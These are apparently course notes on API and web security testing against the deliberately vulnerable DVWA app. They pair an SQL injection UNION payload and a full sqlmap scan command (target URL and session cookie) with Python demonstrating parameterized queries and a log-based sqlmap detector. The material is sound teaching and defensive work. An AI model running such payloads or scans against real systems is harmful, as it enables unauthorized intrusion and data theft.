Online Session 6: Interface (API) Security Testing, 2018-10-14

Pre-class preparation

DVWA

Command injection

SQL injection

Payload: a' UNION SELECT "text1","text2";-- -
Original query: SELECT first_name, last_name FROM users WHERE user_id = '$id';
Query after injection: SELECT first_name, last_name FROM users WHERE user_id = 'a' UNION SELECT "text1","text2";-- -';
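To see why the spliced query above is exploitable and why a bound parameter removes the problem, here is an added Python example (not part of the course material or of DVWA) that uses an in-memory SQLite table standing in for DVWA's `users` table. The payload is the page's UNION payload rewritten with single quotes and without the trailing semicolon so that it fits SQLite's quoting rules and Python's single-statement `execute()`; the table contents are constructed for the demo.

```python
import sqlite3

# Constructed stand-in for DVWA's users table (rows are made up for the demo).
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (user_id TEXT, first_name TEXT, last_name TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [("1", "admin", "admin"), ("2", "Gordon", "Brown")],
    )
    return conn

# The page's payload, adapted to SQLite: single-quoted literals, no ';' so the
# whole thing stays one statement, '-- -' comments out the closing quote.
PAYLOAD = "a' UNION SELECT 'text1','text2'-- -"

def lookup_vulnerable(conn, user_id):
    # Mirrors the DVWA query: the value is spliced into the SQL text, so a
    # quote in the input ends the literal and the rest is parsed as SQL.
    sql = f"SELECT first_name, last_name FROM users WHERE user_id = '{user_id}'"
    return conn.execute(sql).fetchall()

def lookup_parameterized(conn, user_id):
    # Same query with a bound parameter: the driver sends the value separately,
    # so the payload is compared as a plain string and never parsed as SQL.
    sql = "SELECT first_name, last_name FROM users WHERE user_id = ?"
    return conn.execute(sql, (user_id,)).fetchall()

def is_valid_user_id(value):
    # Defence in depth: user_id is numeric in this schema, so reject anything
    # else before it reaches the database at all.
    return value.isdigit()

if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", lookup_vulnerable(db, PAYLOAD))      # attacker-chosen row
    print("parameterized:", lookup_parameterized(db, PAYLOAD))  # no match
    print("allow-list:", is_valid_user_id(PAYLOAD))            # False
```

The vulnerable lookup returns the attacker-supplied `('text1', 'text2')` row even though no user `a` exists, which is exactly what DVWA shows on screen; the parameterized lookup returns nothing, and the allow-list check rejects the input before the query runs.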

Automated scanning with sqlmap

git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git
cd sqlmap
python sqlmap.py -h
python sqlmap.py -u 'http://jenkins.testing-studio.com:8082/vulnerabilities/sqli/?id=1&Submit=Submit' --cookie="PHPSESSID=j06g4qtdrddoou7ovf4sem5dt3; security=low" --dbms=mysql --level=5 --batch
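From the defender's side, a run like the sqlmap command above leaves a recognisable trace in the web server's access log: one client sending many query-string variants against the same path, a burst of server errors, and, unless the operator overrides it, a User-Agent beginning with `sqlmap/`. The following added Python script (not part of the course material) runs that detection over a few constructed Apache combined-format log lines; the client addresses, timestamps and the sqlmap version string are made up for the demo, and the path is the course's DVWA SQLi page.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit

# Constructed access-log lines (Apache combined format) for the demo; not
# captured from the course server. 10.0.0.9 plays the scanner.
SAMPLE_LOG = """\
10.0.0.5 - - [14/Oct/2018:10:00:01 +0800] "GET /vulnerabilities/sqli/?id=1&Submit=Submit HTTP/1.1" 200 4321 "-" "Mozilla/5.0"
10.0.0.9 - - [14/Oct/2018:10:00:02 +0800] "GET /vulnerabilities/sqli/?id=1&Submit=Submit HTTP/1.1" 200 4321 "-" "sqlmap/1.2.10#stable (http://sqlmap.org)"
10.0.0.9 - - [14/Oct/2018:10:00:02 +0800] "GET /vulnerabilities/sqli/?id=1%27&Submit=Submit HTTP/1.1" 500 120 "-" "sqlmap/1.2.10#stable (http://sqlmap.org)"
10.0.0.9 - - [14/Oct/2018:10:00:03 +0800] "GET /vulnerabilities/sqli/?id=1%20AND%201%3D1&Submit=Submit HTTP/1.1" 200 4321 "-" "sqlmap/1.2.10#stable (http://sqlmap.org)"
10.0.0.9 - - [14/Oct/2018:10:00:03 +0800] "GET /vulnerabilities/sqli/?id=1%20AND%201%3D2&Submit=Submit HTTP/1.1" 200 4100 "-" "sqlmap/1.2.10#stable (http://sqlmap.org)"
10.0.0.9 - - [14/Oct/2018:10:00:04 +0800] "GET /vulnerabilities/sqli/?id=1%27%20UNION%20SELECT%20NULL--&Submit=Submit HTTP/1.1" 200 4400 "-" "sqlmap/1.2.10#stable (http://sqlmap.org)"
10.0.0.7 - - [14/Oct/2018:10:00:05 +0800] "GET /login.php HTTP/1.1" 200 1500 "-" "Mozilla/5.0"
"""

# ip ident user [timestamp] "METHOD target PROTO" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)

def parse_line(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    parts = urlsplit(rec["target"])
    rec["path"] = parts.path
    rec["query"] = parts.query
    return rec

def detect_scans(log_text, min_variants=3):
    """Return {client_ip: [reasons]} for clients that look like injection scanners.

    Three independent signals are combined: a scanner User-Agent, many distinct
    query strings against one path, and 5xx responses (broken SQL often 500s).
    """
    variants = defaultdict(set)   # (ip, path) -> distinct query strings seen
    errors = defaultdict(int)     # ip -> number of 5xx responses
    tool_ua = set()               # ips that announced a scanner User-Agent
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        if rec["ua"].lower().startswith("sqlmap/"):
            tool_ua.add(rec["ip"])
        variants[(rec["ip"], rec["path"])].add(rec["query"])
        if rec["status"].startswith("5"):
            errors[rec["ip"]] += 1

    findings = defaultdict(list)
    for ip in sorted(tool_ua):
        findings[ip].append("scanner user-agent")
    for (ip, path), queries in variants.items():
        if len(queries) >= min_variants:
            findings[ip].append(f"{len(queries)} query variants against {path}")
    for ip, count in errors.items():
        findings[ip].append(f"{count} server error(s)")
    return dict(findings)

if __name__ == "__main__":
    for ip, reasons in detect_scans(SAMPLE_LOG).items():
        print(ip, "->", "; ".join(reasons))
```

The User-Agent match is the cheapest signal but also the easiest for an operator to turn off, which is why the per-path variant count and the error count are tracked separately: a real scan trips at least one of them even with a browser-like User-Agent. On a production log the threshold `min_variants` should be tuned against normal search or pagination traffic for that path.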

OWASP ZAP scanning tool

Download: https://www.owasp.org/index.php/OWASP_Zed_Attack_Proxy_Project

Examples of discovered vulnerabilities

Exercise

http://jenkins.testing-studio.com:8082/login.php
Walk through the basic security vulnerabilities and get hands-on experience of the common vulnerabilities and the ways they are attacked.